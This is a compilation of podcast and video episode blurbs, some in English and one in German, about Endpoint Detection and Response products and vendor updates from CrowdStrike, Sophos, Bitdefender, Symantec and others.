In this episode, CBI's Dave Glenn, Dan Gregory and Bjorn Olsen discuss Advanced EDR with our partners Adam Hogan and Rick Lane from CrowdStrike and Erik Wille from our customer Penske.
Dies ist die neunte Folge unseres Avanet Podcasts rund ums Thema Sophos. In dieser Episode sprechen wir unter anderem über die SFOS MR5 und MR6 Releases, klären wichtige Fragen zu Central EDR-Lizenzen und berichten über ein paar Neuerungen in der Weiterentwicklung unserer Webseite. ## XG Firewall Sophos hat mit der Version 17.5 MR5 den APX 120 Support nachgereicht und in der MR6 wurden wichtige Sicherheitslücken im Exim-E-Mail-Server geschlossen. Im Moment besteht noch Handlungsbedarf für die TCP SACK PANIC Sicherheitslücke, wofür Sophos im Juli noch einen Patch bringen wird. Für das kommende SFOS v18 wird mindestens 4GB RAM benötigt, weshalb alle Benutzer, die eine Software-Lizenz für "1 CPU 2GB RAM" besitzen, ein kostenloses Update auf "1 CPU 4GB RAM" bekommen. Aus diesem Grund wurden ja [die Hardware-Produkte XG 85 und XG 105 bereits abgekündigt](https://www.avanet.com/blog/sophos-xg-85-und-xg-105-end-of-sale/). ## Sophos Central Im Themenbereich für Sophos Central sprechen wir in dieser Folge über ein Update des Central Firewall Managers, mit dem man nun auch Backups der Firewalls machen kann. Des Weiteren beantworten wir die Frage, [was euch Endpoint Detection and Response (EDR) bringt](https://www.avanet.com/blog/wozu-endpoint-detection-and-response-edr/) und wann ihr es braucht. Wenn wir gleich beim Thema sind, erklären wir noch, dass [mit EDR keine Mischlizenzen mehr möglich sind](https://www.avanet.com/blog/sophos-central-server-keine-mischlizenzen-mit-edr/). Die Übernahme der Firma "Rook Security" Anfang Juni, kommt ebenfalls kurz zur Sprache. ## Avanet Shop Wir haben an unserer Webseite mal wieder ein paar Änderungen und Verbesserungen vorgenommen, über die wir in dieser Folge ausführlich sprechen. Ihr findet alle Informationen dazu auch in diesem Blogpost: [Avanet Shop: Umstellung auf Bruttopreise und Projektmeldung](https://www.avanet.com/blog/avanet-shop-umstellung-auf-bruttopreise-und-projektmeldung/)
In this episode we look at EDR, or Endpoint Detection and Response. We dig into its past and look at its evolution to what we see today, as well as exploring how it can work for different organisations. Host Michael Bird is joined by Adam Louca, Softcat’s chief technologist for security as well as Russell Humphries, VP of product management for the endpoint security group at Sophos, to discuss the pros and cons that come with the newest generation of endpoint protection software.Further LinksSoftcat's IT PrioritiesIT IntelligenceCyber SecurityHybrid InfrastructureDigital WorkspaceGet in Touch`https://www.softcat.com/podcasts/explain-it/s02e12https://twitter.com/softcathttps://www.linkedin.com/company/softcat/ See acast.com/privacy for privacy and opt-out information.
Security Current podcast - for IT security, networking, risk, compliance and privacy professionals
The business of information security is tough: the bad guys only need to get it right once, while the good guys have to get it right all the time. One hundred percent protection of all endpoints is not possible, and eventually, there will be an infection. The question is, how do you react as quickly as you can to detect the most important infections before they wreak havoc in your system? In this Bitdefender-sponsored podcast, IBM Cloud and SaaS Operations Global CISO David Cass talks to Harish Agastya, VP of Enterprise Solutions at Bitdefender, about the challenges in Endpoint Detection and Response (EDR). They explore how EDR is one of many layers of protection and how it works best when it relies on the intelligence of prior layers. Harish emphasizes how the reduction of noise generated by these often-disparate solutions is crucial and how such solutions need to be available to all players in the market – not just to big organizations with deep pockets.
Many roads lead to Active Directory insecurity, such as e-mail phishing, letting go of your foothold, and all of that can be done without getting caught. These problems can be solved with Endpoint Detection, correlating your network, endpoint, log events, and being encrypted. Paul and John discuss their theories on Active Directories and what to do to save you from being hacked! Full Show Notes: https://wiki.securityweekly.com/ES_Episode73
Many roads lead to Active Directory insecurity, such as e-mail phishing, letting go of your foothold, and all of that can be done without getting caught. These problems can be solved with Endpoint Detection, correlating your network, endpoint, log events, and being encrypted. Paul and John discuss their theories on Active Directories and what to do to save you from being hacked! Full Show Notes: https://wiki.securityweekly.com/ES_Episode73
Enterprises are increasingly under threat from sophisticated attacks. In fact, threats dwell in an organization’s environment an average of 190 days! Security teams also face multiple challenges when attempting to detect and fully expose the extent of an advanced attack. Symantec’s anticipated evolution to full-fledged Endpoint Detection and Response (EDR) is here to address this! There are a lot of enhancements in this latest version of Symantec's ATP, but we will focus on these 5 highlights in this video: 1) Endpoint Activity Recorder - Continuous visibility across SEP endpoints 2) Search, filter and retrieve events for specific endpoints - Search, filter and retrieve events for specific endpoints 3) File-less threat detection - Detect and view suspicious script and memory exploits 4) Hybrid sandboxing - Detonate files on-premises or in the cloud 5) Enhanced APIs and integrations with Splunk, ServiceNow, QRadar - Ease custom integrations and leverage pre-built components Learn more at itsdelivers.com